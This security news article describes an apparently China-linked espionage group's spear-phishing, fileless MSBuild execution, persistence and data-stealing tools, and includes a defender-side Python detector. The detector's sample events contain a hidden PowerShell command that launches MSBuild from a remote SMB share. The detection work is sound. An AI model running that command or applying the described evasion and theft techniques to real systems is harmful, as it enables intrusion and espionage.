
Chinese Threat Actor Attacking South China Sea Governments & military Orgs


A new threat actor, Unfading Sea Haze, has been targeting high-level organizations in South China Sea countries since 2018; the choice of targets and the nature of the attacks suggest Chinese affiliation.

Unfading Sea Haze uses custom tools based on the Gh0st RAT framework and .NET payloads, and its success highlights poor credential hygiene and inadequate patching on victim systems.

Notably, Unfading Sea Haze remained undetected for over five years while targeting South China Sea governments and militaries, which indicates advanced evasion techniques. The group had no prior known associations, but it used Gh0st RAT variants favored by Chinese actors.

While one technique mirrored a feature in APT41’s “funnyswitch” backdoor, no other APT41 tools were found. This suggests Unfading Sea Haze is a skilled actor potentially linked to the broader Chinese cyber landscape, but further investigation is needed for conclusive attribution.

The investigation into the Unfading Sea Haze threat actor revealed multiple spear-phishing campaigns (March-May 2023) utilizing ZIP archives containing LNK files disguised as documents (e.g., “SUMMARIZE SPECIAL ORDERS”). 

Clicking on these LNKs triggers malicious commands, often obfuscated by lengthy comments within the LNK itself, that aim to download a potential payload (“Recorded.log”) from a specified server while potentially checking for a process named “ekrn.exe”.

Attackers abuse legitimate tools like PowerShell and MSBuild to launch fileless attacks: they craft LNK files that trigger PowerShell scripts to download malicious payloads, and those PowerShell scripts then launch MSBuild with a remote working directory containing a malicious project file.

MSBuild executes the project file in memory without writing it to disk, which makes the activity difficult to detect, while attackers use social engineering tactics like file names related to current events to trick users into running the LNK files.
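A defender-side check for the chain just described, added here and not taken from the Bitdefender report: it scans constructed Sysmon-style process-creation records (the sample values, including the host 10.0.0.5, are made up) and flags MSBuild started by PowerShell from a working directory on a remote SMB share with no project file on its command line, alongside a benign Visual Studio build that must stay clean.

```python
import re

# Matches \\host\share\... paths, i.e. a working directory on a remote SMB share.
UNC_RE = re.compile(r"^\\\\[\w.-]+\\\S+")

# Constructed Sysmon-style (Event ID 1) process-creation records, not telemetry
# from the report: an LNK-triggered PowerShell that starts MSBuild from an SMB
# share, the resulting MSBuild process, and a benign Visual Studio build.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'powershell.exe -w hidden -c "Start-Process msbuild.exe -WorkingDirectory \\10.0.0.5\share"',
     "CurrentDirectory": r"C:\Users\alice\Downloads"},
    {"Image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "MSBuild.exe",
     "CurrentDirectory": r"\\10.0.0.5\share"},
    {"Image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
     "ParentImage": r"C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\devenv.exe",
     "CommandLine": r"MSBuild.exe C:\src\app\app.csproj",
     "CurrentDirectory": r"C:\src\app"},
]

def findings(event):
    """Return the names of the suspicious traits one event exhibits."""
    hits = []
    image = event["Image"].lower()
    parent = event["ParentImage"].lower()
    cmd = event.get("CommandLine", "")
    cwd = event.get("CurrentDirectory", "")
    if image.endswith("\\msbuild.exe"):
        if UNC_RE.match(cwd):
            hits.append("msbuild_unc_workdir")      # project file lives on a remote share
        if parent.endswith("\\powershell.exe"):
            hits.append("msbuild_from_powershell")  # scripted rather than IDE-driven build
        if not re.search(r"\.(proj|csproj|sln)\b", cmd, re.I):
            hits.append("msbuild_no_project_arg")   # builds whatever project sits in cwd
    if (image.endswith("\\powershell.exe") and parent.endswith("\\explorer.exe")
            and "msbuild" in cmd.lower()):
        hits.append("powershell_launches_msbuild")  # double-click (LNK) chain from Explorer
    return hits

def scan(events):
    report = []  # (event index, findings) for every event with at least one hit
    for i, event in enumerate(events):
        hits = findings(event)
        if hits:
            report.append((i, hits))
    return report
```

Any single trait can occur in legitimate builds, so the value lies in the combination on one host within a short window; feed real Sysmon exports in the same field names to reuse it.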

Another example showcases a more intricate and obfuscated version of the same technique.

Unfading Sea Haze, a threat actor likely affiliated with the Chinese government, utilizes scheduled tasks for persistence by creating tasks with names mimicking legitimate Windows processes and combining them with DLL sideloading to execute malicious payloads. 

Additionally, they manipulate local administrator accounts by enabling them, resetting passwords, and hiding them from the login screen, as well as incorporating RMM tools and potentially establishing persistence on web servers. 

Placing the malicious DLL next to the program.

They used custom malware for espionage. Until 2023 they relied on the SilentGh0st, TranslucentGh0st, and SharpJSHandler variants, loaded by Ps2dllLoader, a tool for memory-based execution that bypasses file scanning; Ps2dllLoader also patches AMSI and ETW to avoid detection by security software.

An approximate timeline of Gh0st variations deployment.

To further evade detection, Unfading Sea Haze has transitioned to newer tactics: the more modular FluffyGh0st and InsidiousGh0st variants, and in-memory execution of .NET payloads using MSBuild.exe and remote SMB shares.

Script for extracting encrypted data from Google Chrome

They used a combination of custom malware and off-the-shelf tools against victim machines for espionage; Ps2dllLoader also deployed SharpJSHandler, a web shell alternative that executes encoded JavaScript code.

For data collection, they used custom tools like an xkeylog keylogger, a browser data stealer, and a USB/WPD monitor to steal keystrokes, browsing data, and details about connected devices. 

According to Bitdefender, they also used manual techniques like archive tools to collect specific files and application data from messaging apps.
